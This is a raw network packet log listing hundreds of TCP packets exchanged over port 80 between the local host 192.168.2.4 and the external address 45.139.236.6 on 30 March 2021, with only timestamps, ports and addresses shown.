Mar 30, 2021 14:22:53.115628958 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115654945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115680933 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115680933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115705967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115730047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115730047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115753889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115777016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115781069 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115802050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115828037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115830898 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115854025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115870953 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115880013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115906000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115930080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115943909 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.115952015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115976095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.115978956 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.116027117 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.116219044 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192183971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192231894 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192259073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192281961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192306042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192331076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192356110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192379951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192404032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192430973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192456007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192478895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192482948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192504883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192523003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192533016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192533016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192543030 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192559004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192584991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192600012 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192609072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192639112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192646980 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192663908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192687988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192699909 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192719936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192744970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192749977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192773104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192795992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192801952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192821026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192845106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192871094 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192883015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192907095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192934990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192940950 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192961931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.192965984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.192987919 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193011999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193017006 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193038940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193068027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193099022 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193110943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193120003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193136930 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193165064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193188906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193205118 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193213940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193238974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193252087 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193264008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193289995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193298101 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193314075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193334103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193352938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193377972 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193450928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193476915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193487883 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193501949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193527937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193545103 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193552017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193576097 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193584919 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193603992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193629026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193639994 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193654060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193670988 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193679094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193702936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193727970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193732977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193753004 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193777084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193778992 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193805933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193830967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193830967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193856001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193878889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193886042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193903923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193928003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193928003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.193952084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193975925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.193989992 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.194008112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194020987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.194036007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194060087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194082975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194108009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194130898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194132090 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.194144011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.194155931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.194184065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.194226027 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.196269035 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206185102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206223965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206237078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206254005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206269979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206290960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206309080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206325054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206341028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206357002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206372023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206384897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206402063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206418991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206438065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206446886 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206456900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206475973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206494093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206511021 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206516027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206536055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206537008 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206573963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206576109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206578016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206593990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206612110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206628084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206636906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206645966 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206664085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206684113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206693888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206698895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206702948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206721067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206737995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206754923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206759930 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206772089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206788063 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206795931 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206804037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206825018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206806898 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206837893 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206842899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206860065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206870079 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206877947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206907034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206922054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206923008 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206939936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206954956 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.206955910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206975937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206993103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.206998110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207010031 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207021952 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207026958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207045078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207061052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207077026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207078934 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207096100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207113981 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207115889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207134962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207139969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207153082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207170010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207175016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207186937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207202911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207216024 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207220078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207237005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207251072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207263947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207278967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207283974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207302094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207320929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207334995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207343102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207350969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207360983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207380056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207396984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207400084 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207413912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207431078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207442999 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207448006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207468987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207489014 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207496881 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207504034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207508087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207529068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207539082 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207547903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207566977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207583904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207575083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207602024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207622051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207632065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207639933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207657099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207667112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207675934 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207693100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207695961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207710028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207745075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207746983 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207757950 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207770109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207782030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207794905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207807064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207820892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207833052 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207844973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207860947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207881927 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207892895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207900047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207917929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207935095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207940102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207952976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207972050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.207978964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207983971 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.207990885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208008051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208014011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208029985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208049059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208065033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208070040 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208082914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208098888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208102942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208121061 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208128929 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208139896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208158016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208165884 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208178997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208197117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208213091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208214998 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208230019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208233118 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208247900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208264112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208280087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208288908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208297014 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208317995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208328962 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208336115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208353996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208362103 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208372116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208384037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208389044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208410025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.208414078 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.208471060 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.209460974 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.282942057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.282995939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283010006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283023119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283037901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283055067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283068895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283087015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283103943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283126116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283143997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283163071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283179998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283198118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283215046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283231974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283251047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283265114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283277988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283299923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:53.283315897 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:53.283320904 CEST	80	49744	45.139.236.6	192.168.2.4
